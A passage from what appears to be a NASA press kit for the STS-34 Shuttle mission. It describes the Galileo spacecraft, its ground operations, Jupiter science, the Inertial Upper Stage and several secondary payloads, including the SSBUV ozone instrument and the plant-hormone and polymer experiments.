magnetosphere, and observation of the giant +planet itself. + + The orbiter weighs about 5,200 pounds including about 2,400 pounds of +rocket propellant to be expended in some 30 relatively small maneuvers +during the long gravity-assisted flight to Jupiter, the large thrust +maneuver which puts the craft into its Jupiter orbit, and the 30 or so trim +maneuvers planned for the satellite tour phase. + + The retropropulsion module consists of 12 10-newton thrusters, a +single 400-newton engine, and the fuel, oxidizer, and pressurizing-gas +tanks, tubing, valves and control equipment. (A thrust of 10 newtons +would support a weight of about 2.2 pounds at Earth's surface). The +propulsion system was developed and built by +Messerschmitt-Bolkow-Blohm and provided by the Federal Republic of +Germany. + + The orbiter's maximum communications rate is 134 kilobits per second +(the equivalent of about one black-and-white image per minute); there are +other data rates, down to 10 bits per second, for transmitting engineering +data under poor conditions. The spacecraft transmitters operate at +S-band and X-band (2295 and 8415 megahertz) frequencies between Earth +and on L-band between the probe. + + The high-gain antenna is a 16-foot umbrella-like reflector unfurled +after the first Earth flyby. Two low-gain antennas (one pointed forward +and one aft, both mounted on the spinning section) are provided to support +communications during the Earth-Venus-Earth leg of the flight and +whenever the main antenna is not deployed and pointed at Earth. The +despun section of the orbiter carries a radio relay antenna for receiving +the probe's data transmissions. + + Electrical power is provided to Galileo's equipment by two radioisotope +thermoelectric generators. Heat produced by natural radioactive decay of +plutonium 238 dioxide is converted to approximately 500 watts of +electricity (570 watts at launch, 480 at the end of the mission) to operate +the orbiter equipment for its 8-year active period. This is the same type +of power source used by the Voyager and Pioneer Jupiter spacecraft in +their long outer-planet missions, by the Viking lander spacecraft on Mars +and the lunar scientific packages left on the Moon. + + Most spacecraft are stabilized in flight either by spinning around a +major axis or by maintaining a fixed orientation in space, referenced to +the sun and another star. Galileo represents a hybrid of these techniques, +with a spinning section rotating ordinarily at 3 rpm and a "despun" section +which is counter-rotated to provide a fixed orientation for cameras and +other remote sensors. + + Instruments that measure fields and particles, together with the main +antenna, the power supply, the propulsion module, most of the computers +and control electronics, are mounted on the spinning section. The +instruments include magnetometer sensors mounted on a 36-foot boom to +escape interference from the spacecraft; a plasma instrument detecting +low-energy charged particles and a plasma-wave detector to study waves +generated in planetary magnetospheres and by lightning discharges; a +high-energy particle detector; and a detector of cosmic and Jovian dust. + + The despun section carries instruments and other equipment whose +operation depends on a fixed orientation in space. The instruments include +the camera system; the near-infrared mapping spectrometer to make +multispectral images for atmosphere and surface chemical analysis; the +ultraviolet spectrometer to study gases and ionized gases; and the +photopolarimeter radiometer to measure radiant and reflected energy. The +camera system is expected to obtain images of Jupiter's satellites at +resolutions from 20 to 1,000 times better than Voyager's best. + + This section also carries a dish antenna to track the probe in Jupiter's +atmosphere and pick up its signals for relay to Earth. The probe is carried +on the despun section, and before it is released, the whole spacecraft is +spun up briefly to 10 rpm in order to spin-stabilize the probe. + + The Galileo spacecraft will carry out its complex operations, including +maneuvers, scientific observations and communications, in response to +stored sequences which are interpreted and executed by various on-board +computers. These sequences are sent up to the orbiter periodically +through the Deep Space Network in the form of command loads. + + +GROUND SYSTEMS + + Galileo communicates with Earth via NASA's Deep Space Network +(DSN), which has a complex of large antennas with receivers and +transmitters located in the California desert, another in Australia and a +third in Spain, linked to a network control center at NASAUs Jet Propulsion +Laboratory in Pasadena, Calif. The spacecraft receives commands, sends +science and engineering data, and is tracked by Doppler and ranging +measurements through this network. + + At JPL, about 275 scientists, engineers and technicians, will be +supporting the mission at launch, increasing to nearly 400 for Jupiter +operations including support from the German retropropulsion team at +their control center in the FGR. Their responsibilities include spacecraft +command, interpreting engineering and scientific data from Galileo to +understand its performance, and analyzing navigation data from the DSN. +The controllers use a set of complex computer programs to help them +control the spacecraft and interpret the data. + + Because the time delay in radio signals from Earth to Jupiter and back +is more than an hour, the Galileo spacecraft was designed to operate from +programs sent to it in advance and stored in spacecraft memory. A single +master sequence program can cover 4 weeks of quiet operations between +planetary and satellite encounters. During busy Jupiter operations, one +program covers only a few days. Actual spacecraft tasks are carried out +by several subsystems and scientific instruments, many of which work +from their own computers controlled by the main sequence. + + Designing these sequences is a complex process balancing the desire to +make certain scientific observations with the need to safeguard the +spacecraft and mission. The sequence design process itself is supported +by software programs, for example, which display to the scientist maps of +the instrument coverage on the surface of an approaching satellite for a +given spacecraft orientation and trajectory. Notwithstanding these aids, +a typical 3-day satellite encounter may take efforts spread over many +months to design, check and recheck. The controllers also use software +designed to check the command sequence further against flight rules and +constraints. + + The spacecraft regularly reports its status and health through an +extensive set of engineering measurements. Interpreting these data into +trends and averting or working around equipment failures is a major task +for the mission operations team. Conclusions from this activity become +an important input, along with scientific plans, to the sequence design +process. This too is supported by computer programs written and used in +the mission support area. + + Navigation is the process of estimating, from radio range and Doppler +measurements, the position and velocity of the spacecraft to predict its +flight path and design course-correcting maneuvers. These calculations +must be done with computer support. The Galileo mission, with its +complex gravity-assist flight to Jupiter and 10 gravity-assist satellite +encounters in the Jovian system, is extremely dependent on consistently +accurate navigation. + + In addition to the programs that directly operate the spacecraft and +are periodically transmitted to it, the mission operations team uses +software amounting to 650,000 lines of programming code in the sequence +design process; 1,615,000 lines in the telemetry interpretation; and +550,000 lines of code in navigation. These must all be written, checked, +tested, used in mission simulations and, in many cases, revised before the +mission can begin. + +Science investigators are located at JPL or other university laboratories +and linked by computers. From any of these locations, the scientists can +be involved in developing the sequences affecting their experiments and, +in some cases, in helping to change preplanned sequences to follow up on +unexpected discoveries with second looks and confirming observations. + + + + +JUPITER'S SYSTEM + + Jupiter is the largest and fastest-spinning planet in the solar system. +Its radius is more than 11 times Earth's, and its mass is 318 times that of +our planet. Named for the chief of the Roman gods, Jupiter contains more +mass than all the other planets combined. It is made mostly of light +elements, principally hydrogen and helium. Its atmosphere and clouds are +deep and dense, and a significant amount of energy is emitted from its +interior. + + The earliest Earth-based telescopic observations showed bands and +spots in Jupiter's atmosphere. One storm system, the Red Spot, has been +seen to persist over three centuries. + + Atmospheric forms and dynamics were observed in increasing detail +with the Pioneer and Voyager flyby spacecraft, and Earth-based infrared +astronomers have recently studied the nature and vertical dynamics of +deeper clouds. + + Sixteen satellites are known. The four largest, discovered by the +Italian scientist Galileo Galilei in 1610, are the size of small planets. +The innermost of these, Io, has active sulfurous volcanoes, discovered by +Voyager 1 and further observed by Voyager 2 and Earth-based infrared +astronomy. Io and Europa are about the size and density of Earth's moon (3 +to 4 times the density of water) and probably rocky inside. Ganymede and +Callisto, further out from Jupiter, are the size of Mercury but less than +twice as dense as water. Their cratered surfaces look icy in Voyager +images, and they may be composed partly of ice or water. + + Of the other satellites, eight (probably captured asteroids) orbit +irregularly far from the planet, and four (three discovered by the Voyager +mission in 1979) are close to the planet. Voyager also discovered a thin +ring system at Jupiter in 1979. + + Jupiter has the strongest planetary magnetic field known. The +resulting magnetosphere is a huge teardrop-shaped, plasma-filled cavity +in the solar wind pointing away from the sun. JupiterUs magnetosphere is +the largest single entity in our solar system, measuring more than 14 +times the diameter of the sun. The inner part of the magnetic field is +doughnut- shaped, but farther out it flattens into a disk. The magnetic +poles are offset and tilted relative to Jupiter's axis of rotation, so the +field appears to wobble with Jupiter's rotation (just under 10 hours), +sweeping up and down across the inner satellites and making waves +throughout the magnetosphere. + + + + +WHY JUPITER INVESTIGATIONS ARE IMPORTANT + + With a thin skin of turbulent winds and brilliant, swift-moving clouds, +the huge sphere of Jupiter is a vast sea of liquid hydrogen and helium. +Jupiter's composition (about 88 percent hydrogen and 11 percent helium +with small amounts of methane, ammonia and water) is thought to +resemble the makeup of the solar nebula, the cloud of gas and dust from +which the sun and planets formed. Scientists believe Jupiter holds +important clues to conditions in the early solar system and the process of +planet formation. + + Jupiter may also provide insights into the formation of the universe +itself. Since it resembles the interstellar gas and dust that are thought +to have been created in the "Big Bang," studies of Jupiter may help +scientists calibrate models of the beginning of the universe. + + Though starlike in composition, Jupiter is too small to generate +temperatures high enough to ignite nuclear fusion, the process that +powers the stars. Some scientists believe that the sun and Jupiter began +as unequal partners in a binary star system. (If a double star system had +developed, it is unlikely life could have arisen in the solar system.) While +in a sense a "failed star," Jupiter is almost as large as a planet can be. If +it contained more mass, it would not have grown larger, but would have +shrunk from compression by its own gravity. If it were 100 times more +massive, thermonuclear reactions would ignite, and Jupiter would be a +star. + + For a brief period after its formation, Jupiter was much hotter, more +luminous, and about 10 times larger than it is now, scientists believe. +Soon after accretion (the condensation of a gas and dust cloud into a +planet), its brightness dropped from about one percent of the Sun's to +about one billionth -- a decline of ten million times. + + In its present state Jupiter emits about twice as much heat as it +receives from the Sun. The loss of this heat -- residual energy left over +from the compressive heat of accretion -- means that Jupiter is cooling +and losing energy at a tremendously rapid rate. Temperatures in Jupiter's +core, which were about 90,000 degrees Fahrenheit in the planet's hot, +early phase, are now about 54,000 degrees Fahrenheit, 100 times hotter +than any terrestrial surface, but 500 times cooler than the temperature at +the center of the sun. Temperatures on Jupiter now range from 54,000 +degrees Fahrenheit at the core to minus 248 degrees Fahrenheit at the top +of the cloud banks. + + Mainly uniform in composition, Jupiter's structure is determined by +gradations in temperature and pressure. Deep in Jupiter's interior there is +thought to be a small rocky core, comprising about four percent of the +planet's mass. This "small" core (about the size of 10 Earths) is +surrounded by a 25,000-mile-thick layer of liquid metallic hydrogen. +(Metallic hydrogen is liquid, but sufficiently compressed to behave as +metal.) Motions of this liquid "metal" are the source of the planet's +enormous magnetic field. This field is created by the same dynamo effect +found in the metallic cores of Earth and other planets. + + At the outer limit of the metallic hydrogen layer, pressures equal three +million times that of Earth's atmosphere and the temperature has cooled +to 19,000 degrees Fahrenheit. + + Surrounding the central metallic hydrogen region is an outer shell of +"liquid" molecular hydrogen. Huge pressures compress Jupiter's gaseous +hydrogen until, at this level, it behaves like a liquid. The liquid hydrogen +layer extends upward for about 15,000 miles. Then it gradually becomes +gaseous. This transition region between liquid and gas marks, in a sense, +where the solid and liquid planet ends and its atmosphere begins. + + From here, Jupiter's atmosphere extends up for 600 more miles, but +only in the top 50 miles are found the brilliant bands of clouds for which +Jupiter is known. The tops of these bands are colored bright yellow, red +and orange from traces of phosphorous and sulfur. Five or six of these +bands, counterflowing east and west, encircle the planet in each +hemisphere. At one point near Jupiter's equator, east winds of 220 mph +blow right next to west winds of 110 mph. At boundaries of these bands, +rapid changes in wind speed and direction create large areas of turbulence +and shear. These are the same forces that create tornados here on Earth. +On Jupiter, these "baroclinic instabilities" are major phenomena, creating +chaotic, swirling winds and spiral features such as White Ovals. + + The brightest cloud banks, known as zones, are believed to be higher, +cooler areas where gases are ascending. The darker bands, called belts, + + + + + + +are thought to be warmer, cloudier regions of descent. + + The top cloud layer consists of white cirrus clouds of ammonia +crystals, at a pressure six-tenths that of Earth's atmosphere at sea level +(.6 bar). Beneath this layer, at a pressure of about two Earth atmospheres +(2 bars) and a temperature of near minus 160 degrees Fahrenheit, a +reddish-brown cloud of ammonium hydrosulfide is predicted. + + At a pressure of about 6 bars, there are believed to be clouds of water +and ice. However, recent Earth-based spectroscopic studies suggest that +there may be less water on Jupiter than expected. While scientists +previously believed Jupiter and the sun would have similar proportions of +water, recent work indicates there may be 100 times less water on +Jupiter than if it had a solar mixture of elements. If this is the case, +there may be only a thin layer of water-ice at the 6 bar level. + + However, Jupiter's cloud structure, except for the highest layer of +ammonia crystals, remains uncertain. The height of the lower clouds is +still theoretical -- clouds are predicted to lie at the temperature levels +where their assumed constituents are expected to condense. The Galileo +probe will make the first direct observations of Jupiter's lower +atmosphere and clouds, providing crucial information. + + The forces driving Jupiter's fast-moving winds are not well understood +yet. The classical explanation holds that strong currents are created by +convection of heat from Jupiter's hot interior to the cooler polar regions, +much as winds and ocean currents are driven on Earth, from equator to +poles. But temperature differences do not fully explain wind velocities +that can reach 265 mph. An alternative theory is that pressure +differences, due to changes in the thermodynamic state of hydrogen at +high and low temperatures, set up the wind jets. + + Jupiter's rapid rotation rate is thought to have effects on wind +velocity and to produce some of Jupiter's bizarre circulation patterns, +including many spiral features. These rotational effects are known as +manifestations of the Coriolis force. Coriolis force is what determines +the spin direction of weather systems. It basically means that on the +surface of a sphere (a planet), a parcel of gas farther from the poles has a +higher rotational velocity around the planet than a parcel closer to the +poles. As gases then move north or south, interacting parcels with +different velocities produce vortices (whirlpools). This may account for +some of Jupiter's circular surface features. + +Jupiter spins faster than any planet in the solar system. Though 11 times +Earth's diameter, Jupiter spins more than twice as fast (once in 10 hours), +giving gases on the surface extremely high rates of travel -- 22,000 mph +at the equator, compared with 1000 mph for air at Earth's equator. +Jupiter's rapid spin also causes this gas and liquid planet to flatten +markedly at the poles and bulge at the equator. + + Visible at the top of Jupiter's atmosphere are eye-catching features +such as the famous Great Red Spot and the exotic White Ovals, Brown +Barges and White Plumes. The Great Red Spot, which is 25,000 miles wide +and large enough to swallow three Earths, is an enormous oval eddy of + + + + + + +swirling gases. It is driven by two counter-flowing jet streams, which +pass, one on each side of it, moving in opposite directions, each with +speeds of 100-200 mph. The Great Red Spot was first discovered in 1664, +by the British scientist Roger Hook, using Galileo's telescope. In the three +centuries since, the huge vortex has remained constant in latitude in +Jupiter's southern equatorial belt. Because of its stable position, +astronomers once thought it might be a volcano. + + Another past theory compared the Great Red Spot to a gigantic +hurricane. However, the GRS rotates anti-cyclonically while hurricanes +are cyclonic features (counterclockwise in the northern hemisphere, +clockwise in the southern) -- and the dynamics of the Great Red Spot +appear unrelated to moisture. + + The Great Red Spot most closely resembles an enormous tornado, a huge +vortex that sucks in smaller vortices. The Coriolis effect created by +Jupiter's fast spin, appears to be the key to the dynamics that drive the +spot. + + The source of the Great Red Spot's color remains a mystery. Many +scientists now believe it to be caused by phosphorus, but its spectral line +does not quite match that of phosphorus. The GRS may be the largest in a +whole array of spiral phenomena with similar dynamics. About a dozen +white ovals, circulation patterns resembling the GRS, exist in the +southern latitudes of Jupiter and appear to be driven by the same forces. +Scientists do not know why these ovals are white. + + Scientists believe the brown barges, which appear like dark patches on +the planet, are holes in the upper clouds, through which the reddish-brown +lower cloud layer may be glimpsed. The equatorial plumes, or white +plumes, may be a type of wispy cirrus anvil cloud. + + + + +SPACECRAFT CHARACTERISTICS + + + Orbiter Probe + +Mass,lbs. 5,242 744 + +Propellant, lbs. 2,400 none + +Height (in-flight) 15 feet 34 inches + +Inflight span 30 feet +(w/oboom) + +Instrument payload 10 instruments 6 instruments + +Payload mass, lbs. 260 66 + +Electric power, watts 570-480 730 + + + + + + + (RTGs) (Lithium-sulfur battery) + + + + + +GALILEO MANAGEMENT + + The Galileo Project is managed for NASA's Office of Space Science and +Applications by the NASA Jet Propulsion Laboratory, Pasadena, Calif. This +responsibility includes designing, building, testing, operating and tracking +Galileo. NASA's Ames Research Center, Moffett Field, Calif. is responsible +for the atmosphere probe, which was built by Hughes Aircraft Company, El +Segundo, Calif. + + The probe project and science teams will be stationed at Ames during +pre-mission, mission operations, and data reduction periods. Team +members will be at Jet Propulsion Laboratory for probe entry. + + The Federal Republic of Germany has furnished the orbiter's +retropropulsion module and is participating in the scientific +investigations. The radioisotope thermoelectric generators were designed +and built for the U.S. Department of Energy by the General Electric +Company. + + + + +GALILEO ORBITER AND PROBE SCIENTIFIC INVESTIGATIONS + +Listed by experiment/instrument and including the Principal Investigator +and scientific objectives of that investigation: + +PROBE + +Atmospheric Structure; A. Seiff, NASA's Ames Research Center; +temperature, pressure, density, molecular weight profiles; + +Neutral Mass Spectrometer; H. Niemann, NASA's Goddard Space Flight +Center; chemical composition + +Helium Abundance; U. von Zahn, Bonn University, FRG; helium/hydrogen +ratio + +Nephelometer; B. Ragent, NASA's Ames Research Center; clouds, +solid/liquid particles + +Net Flux Radiometer; L. Sromovsky, University of Wisconsin-Madison; +thermal/solar energy profiles + +Lightning/Energetic Particles; L. Lanzerotti, Bell Laboratories; detect +lightning, measuring energetic particles + + + + + + + + +ORBITER (DESPUN PLATFORM) + +Solid-State Imaging Camera; M. Belton, National Optical Astronomy +Observatories (Team Leader); Galilean satellites at 1-km resolution or +better + +Near-Infrared Mapping Spectrometer; R. Carlson, NASA's Jet Propulsion +Laboratory; surface/atmospheric composition, thermal mapping + +Ultraviolet Spectrometer; C. Hord, University of Colorado; atmospheric +gases, aerosols + +Photopolarimeter Radiometer; J. Hansen, Goddard Institute for Space +Studies; atmospheric particles, thermal/reflected radiation + + +ORBITER (SPINNING SPACECRAFT SECTION) + +Magnetometer; M. Kivelson, University of California at Los Angeles; +strength and fluctuations of magnetic fields + +Energetic Particles; D. Williams, Johns Hopkins Applied Physics +Laboratory; electrons, protons, heavy ions in magnetosphere and +interplanetary space + +Plasma; L. Frank, University of Iowa; composition, energy, distribution of +magnetospheric ions + +Plasma Wave; D. Gurnett, University of Iowa; electromagnetic waves and +wave-particle interactions + +Dust; E. Grun, Max Planck Institute; mass, velocity, charge of submicron +particles + +Radio Science - Celestial Mechanics; J. Anderson, JPL (Team Leader); +masses and motions of bodies from spacecraft tracking; + +Radio Science - Propagation; H. T. Howard, Stanford University; satellite +radii, atmospheric structure both from radio propagation + + + + + +INTERDISCIPLINARY INVESTIGATORS + +F. P. Fanale; University of Hawaii + +P. Gierasch; Cornell University + +D. M. Hunten; University of Arizona + +A. P. Ingersoll; California Institute of Technology + + + + + + + +H. Masursky; U. S. Geological Survey + +D. Morrison; Ames Research Center + +M. McElroy; Harvard University + +G. S. Orton; NASA's Jet Propulsion Laboratory + +T. Owen; State University of New York, Stonybrook + +J. B. Pollack; NASA's Ames Research Center + +C. T Russell; University of California at Los Angeles + +C. Sagan; Cornell University + +G. Schubert; University of California at Los Angeles + +J. Van Allen; University of Iowa + + + + +STS-34 INERTIAL UPPER STAGE (IUS-19) + + The Inertial Upper Stage (IUS) will again be used with the Space +Shuttle, this time to transport NASA's Galileo spacecraft out of Earth's +orbit to Jupiter, a 2.5-billion-mile journey. + + The IUS has been used previously to place three Tracking and Data +Relay Satellites in geostationary orbit as well as to inject the Magellan +spacecraft into its interplanetary trajectory to Venus. In addition, the +IUS has been selected by the agency for the Ulysses solar polar orbit +mission. + + After 2 1/2 years of competition, Boeing Aerospace Co., Seattle, was +selected in August 1976 to begin preliminary design of the IUS. The IUS +was developed and built under contract to the Air Force Systems +Command's Space Systems Division. The Space Systems Division is +executive agent for all Department of Defense activities pertaining to the +Space Shuttle system. NASA, through the Marshall Space Flight Center, +Huntsville, Ala., purchases the IUS through the Air Force and manages the +integration activities of the upper stage to NASA spacecraft. + + +Specifications + + IUS-19, to be used on mission STS-34, is a two-stage vehicle weighing +approximately 32,500 lbs. Each stage has a solid rocket motor (SRM), +preferred over liquid-fueled engines because of SRM's relative simplicity, +high reliability, low cost and safety. + + The IUS is 17 ft. long and 9.25 ft. in diameter. It consists of an aft +skirt, an aft stage SRM generating approximately 42,000 lbs. of thrust, an + + + + + + +interstage, a forward-stage SRM generating approximately 18,000 lbs. of +thrust, and an equipment support section. + + +Airborne Support Equipment + + The IUS Airborne Support Equipment (ASE) is the mechanical, avionics +and structural equipment located in the orbiter. The ASE supports the IUS +and the Galileo in the orbiter payload bay and elevates the combination for +final checkout and deployment from the orbiter. + + The IUS ASE consists of the structure, electromechanical mechanisms, +batteries, electronics and cabling to support the Galileo/IUS. These ASE +subsystems enable the deployment of the combined vehicle; provide, +distribute and/or control electrical power to the IUS and spacecraft; +provide plumbing to cool the radioisotope thermoelectric generator (RTG) +aboard Galileo; and serve as communication paths between the IUS and/or +spacecraft and the orbiter. + + +IUS Structure + + The IUS structure is capable of supporting loads generated internally +and also by the cantilevered spacecraft during orbiter operations and the +IUS free flight. It is made of aluminum skin-stringer construction, with +longerons and ring frames. + + +Equipment Support Section + + The top of the equipment support section contains the spacecraft +interface mounting ring and electrical interface connector segment for +mating and integrating the spacecraft with the IUS. Thermal isolation is +provided by a multilayer insulation blanket across the interface between +the IUS and Galileo. + + The equipment support section also contains the avionics which +provide guidance, navigation, control, telemetry, command and data +management, reaction control and electrical power. All mission-critical +components of the avionics system, along with thrust vector actuators, +reaction control thrusters, motor igniter and pyrotechnic stage separation +equipment are redundant to assure reliability of better than 98 percent. + + +IUS Avionics Subsystems + + The avionics subsystems consist of the telemetry, tracking and +command subsystems; guidance and navigation subsystem; data +management; thrust vector control; and electrical power subsystems. +These subsystems include all the electronic and electrical hardware used +to perform all computations, signal conditioning, data processing and +formatting associated with navigation, guidance, control, data and +redundancy management. The IUS avionics subsystems also provide the +equipment for communications between the orbiter and ground stations as + + + + + + +well as electrical power distribution. + + Attitude control in response to guidance commands is provided by +thrust vectoring during powered flight and by reaction control thrusters +while coasting. Attitude is compared with guidance commands to +generate error signals. During solid motor firing, these commands gimble +the IUS's movable nozzle to provide the desired pitch and yaw control. The +IUS's roll axis thrusters maintain roll control. While coasting, the error +signals are processed in the computer to generate thruster commands to +maintain the vehicle's altitude or to maneuver the vehicle. + + The IUS electrical power subsystem consists of avionics batteries, IUS +power distribution units, a power transfer unit, utility batteries, a +pyrotechnic switching unit, an IUS wiring harness and umbilical and +staging connectors. The IUS avionics system provides 5-volt electrical +power to the Galileo/IUS interface connector for use by the spacecraft +telemetry system. + + +IUS Solid Rocket Motors + + The IUS two-stage vehicle uses a large solid rocket motor and a small +solid rocket motor. These motors employ movable nozzles for thrust +vector control. The nozzles provide up to 4 degrees of steering on the +large motor and 7 degrees on the small motor. The large motor is the +longest-thrusting duration SRM ever developed for space, with the +capability to thrust as long as 150 seconds. Mission requirements and +constraints (such as weight) can be met by tailoring the amount of +propellant carried. The IUS-19 first-stage motor will carry 21,488 lb. of +propellant; the second stage 6,067 lb. + + +Reaction Control System + +The reaction control system controls the Galileo/IUS spacecraft attitude +during coasting, roll control during SRM thrustings, velocity impulses for +accurate orbit injection and the final collision-avoidance maneuver after +separation from the Galileo spacecraft. + +As a minimum, the IUS includes one reaction control fuel tank with a +capacity of 120 lb. of hydrazine. Production options are available to add a +second or third tank. However, IUS-19 will require only one tank. + + +IUS To Spacecraft Interfaces + +Galileo is physically attached to the IUS at eight attachment points, +providing substantial load-carrying capability while minimizing the +transfer of heat across the connecting points. Power, command and data +transmission between the two are provided by several IUS interface +connectors. In addition, the IUS provides a multilayer insulation blanket +of aluminized Kapton with polyester net spacers across the Galileo/IUS +interface, along with an aluminized Beta cloth outer layer. All IUS +thermal blankets are vented toward and into the IUS cavity, which in turn + + + + + + +is vented to the orbiter payload bay. There is no gas flow between the +spacecraft and the IUS. The thermal blankets are grounded to the IUS +structure to prevent electrostatic charge buildup. + + +Flight Sequence + +After the orbiter payload bay doors are opened in orbit, the orbiter will +maintain a preselected attitude to keep the payload within thermal +requirements and constraints. + +On-orbit predeployment checkout begins, followed by an IUS command link +check and spacecraft communications command check. Orbiter trim +maneuvers are normally performed at this time. + + Forward payload restraints will be released and the aft frame of the +airborne-support equipment will tilt the Galileo/IUS to 29 degrees. This +will extend the payload into space just outside the orbiter payload bay, +allowing direct communication with Earth during systems checkout. The +orbiter then will be maneuvered to the deployment attitude. If a problem +has developed within the spacecraft or IUS, the IUS and its payload can be +restowed. + + Prior to deployment, the spacecraft electrical power source will be +switched from orbiter power to IUS internal power by the orbiter flight +crew. After verifying that the spacecraft is on IUS internal power and +that all Galileo/IUS predeployment operations have been successfully +completed, a GO/NO-GO decision for deployment will be sent to the crew +from ground support. + + When the orbiter flight crew is given a "Go" decision, they will +activate the ordnance that separates the spacecraft's umbilical cables. +The crew then will command the electromechanical tilt actuator to raise +the tilt table to a 58-degree deployment position. The orbiter's RCS +thrusters will be inhibited and an ordnance-separation device initiated to +physically separate the IUS/spacecraft combination from the tilt table. + + Six hours, 20 minutes into the mission, compressed springs provide the +force to jettison the IUS/Galileo from the orbiter payload bay at +approximately 6 inches per second. The deployment is normally performed +in the shadow of the orbiter or in Earth eclipse. + + The tilt table then will be lowered to minus 6 degrees after IUS and its +spacecraft are deployed. A small orbiter maneuver is made to back away +from IUS/Galileo. Approximately 15 minutes after deployment, the +orbiter's OMS engines will be ignited to move the orbiter away from its +released payload. + + After deployment, the IUS/Galileo is controlled by the IUS onboard +computers. Approximately 10 minutes after IUS/Galileo deployment from +the orbiter, the IUS onboard computer will send out signals used by the +IUS and/or Galileo to begin mission sequence events. This signal will also +enable the IUS reaction control system. All subsequent operations will be +sequenced by the IUS computer, from transfer orbit injection through + + + + + + +spacecraft separation and IUS deactivation. + + After the RCS has been activated, the IUS will maneuver to the +required thermal attitude and perform any required spacecraft thermal +control maneuvers. + + At approximately 45 minutes after deployment from the orbiter, the +ordnance inhibits for the first SRM will be removed. The belly of the +orbiter already will have been oriented towards the IUS/Galileo to protect +orbiter windows from the IUS's plume. The IUS will recompute the first +ignition time and maneuvers necessary to attain the proper attitude for +the first thrusting period. When the proper transfer orbit opportunity is +reached, the IUS computer will send the signal to ignite the first stage +motor 60 minutes after deployment. After firing approximately 150 +seconds, the IUS first stage will have expended its propellant and will be +separated from the IUS second stage. + + Approximately 140 seconds after first-stage burnout, the second- +stage motor will be ignited, thrusting about 108 seconds. The IUS second +stage then will separate and perform a final collision/contamination +avoidance maneuver before deactivating. + + + + +SHUTTLE SOLAR BACKSCATTER ULTRAVIOLET INSTRUMENT + + The Shuttle Solar Backscatter Ultraviolet (SSBUV) instrument was +developed by NASA to calibrate similar ozone measuring space-based +instruments on the National Oceanic and Atmospheric Administration's +TIROS satellites (NOAA-9 and -11). + + The SSBUV will help scientists solve the problem of data reliability +caused by calibration drift of solar backscatter ultraviolet (SBUV) +instruments on orbiting spacecraft. The SSBUV uses the Space Shuttle's +orbital flight path to assess instrument performance by directly +comparing data from identical instruments aboard the TIROS spacecraft, +as the Shuttle and the satellite pass over the same Earth location within a +1-hour window. These orbital coincidences can occur 17 times per day. + + The SBUV measures the amount and height distribution of ozone in the +upper atmosphere. It does this by measuring incident solar ultraviolet +radiation and ultraviolet radiation backscattered from the Earth's +atmosphere. The SBUV measures these parameters in 12 discrete +wavelength channels in the ultraviolet. Because ozone absorbs in the +ultraviolet, an ozone measurement can be derived from the ratio of +backscatter radiation at different wavelengths, providing an index of the +vertical distribution of ozone in the atmosphere. + + Global concern over the depletion of the ozone layer has sparked +increased emphasis on developing and improving ozone measurement +methods and instruments. Accurate, reliable measurements from space +are critical to the detection of ozone trends and for assessing the +potential effects and development of corrective measures. + + + + + + + + The SSBUV missions are so important to the support of Earth science +that six additional missions have been added to the Shuttle manifest for +calibrating ozone instruments on future TIROS satellites. In addition, the +dates of the four previously manifested SSBUV flights have been +accelerated. + + The SSBUV instrument and its dedicated electronics, power, data and +command systems are mounted in the Shuttle's payload bay in two Get +Away Special canisters, an instrument canister and a support canister. +Together, they weigh approximately 1200 lb. The instrument canister +holds the SSBUV, its specially designed aspect sensors and in-flight +calibration system. A motorized door assembly opens the canister to +allow the SSBUV to view the sun and Earth and closes during the in-flight +calibration sequence. + + The support canister contains the power system, data storage and +command decoders. The dedicated power system can operate the SSBUV +for a total of approximately 40 hours. + + The SSBUV is managed by NASA's Goddard Space Flight Center, +Greenbelt, Md. Ernest Hilsenrath is the principal investigator. + + + + + +GROWTH HORMONE CONCENTRATIONS AND DISTRIBUTION IN PLANTS + + The Growth Hormone Concentration and Distribution in Plants (GHCD) +experiment is designed to determine the effects of microgravity on the +concentration, turnover properties, and behavior of the plant growth +hormone, Auxin, in corn shoot tissue (Zea Mays). + + Mounted in foam blocks inside two standard middeck lockers, the +equipment consists of four plant cannisters, two gaseous nitrogen +freezers and two temperature recorders. Equipment for the experiment, +excluding the lockers, weighs 97.5 pounds. + + A total of 228 specimens (Zea Mays seeds) are "planted" in special +filter, paper-Teflon tube holders no more than 56 hours prior to flight. +The seeds remain in total darkness throughout the mission. + + The GHCD experiment equipment and specimens will be prepared in a +Payload Processing Facility at KSC and placed in the middeck lockers. The +GHCD lockers will be installed in the orbiter middeck within the last 14 +hours before launch. + + No sooner than 72 hours after launch, mission specialist Ellen Baker +will place two of the plant cannisters into the gaseous nitrogen freezers +to arrest the plant growth and preserve the specimens. The payload will +be restowed in the lockers for the remainder of the mission. + + After landing, the payload must be removed from the orbiter within 2 + + + + + + +hours and will be returned to customer representatives at the landing site. +The specimens will be examined post flight for microgravity effects. + + The GHCD experiment is sponsored by NASA Headquarters, the Johnson +Space Center and Michigan State University. + + + + +POLYMER MORPHOLOGY + + The Polymer Morphology (PM) experiment is a 3M-developed organic +materials processing experiment designed to explore the effects of +microgravity on polymeric materials as they are processed in space. + + Since melt processing is one of the more industrially significant +methods for making products from polymers, it has been chosen for study +in the PM experiment. Key aspects of melt processing include +polymerization, crystallization and phase separation. Each aspect will be +examined in the experiment. The polymeric systems for the first flight of +PM include polyethelyne, nylon-6 and polymer blends. + + The apparatus for the experiment includes a Fournier transform +infrared (FTIR) spectrometer, an automatic sample manipulating system +and a process control and data acquisition computer known as the Generic +Electronics Module (GEM). The experiment is contained in two separate, +hermetically sealed containers that are mounted in the middeck of the +orbiter. Each container includes an integral heat exchanger that transfers +heat from the interior of the containers to the orbiter's environment. All +sample materials are kept in triple containers for the safety of the +astronauts. + + The PM experiment weighs approximately 200 lb., occupies three +standard middeck locker spaces (6 cubic ft., total) in the orbiter and +requires 240 watts to operate. + + Mission specialists Franklin R. Chang-Diaz and Shannon W. Lucid are +responsible for the operation of the PM experiment on orbit. Their +interface with the PM experiment is through a small, NASA-supplied +laptop computer that is used as an input and output device for the main PM +computer. This interface has been programmed by 3M engineers to manage +and display the large quantity of data that is available to the crew. The +astronauts will have an active role in the operation of the experiment. + + In the PM experiment, infrared spectra (400 to 5000 cm-1) will be +acquired from the FTIR by the GEM computer once every 3.2 seconds as the +materials are processed on orbit. During the 100 hours of processing +time, approximately 2 gigabytes of data will be collected. Post flight, 3M +scientists will process the data to reveal the effects of microgravity on +the samples processed in space. + + The PM experiment is unique among material processing experiments in +that measurements characterizing the effects of microgravity will be +made in real time, as the materials are processed in space. + + + + + + + + In most materials processing space experiments, the materials have +been processed in space with little or no measurements made during 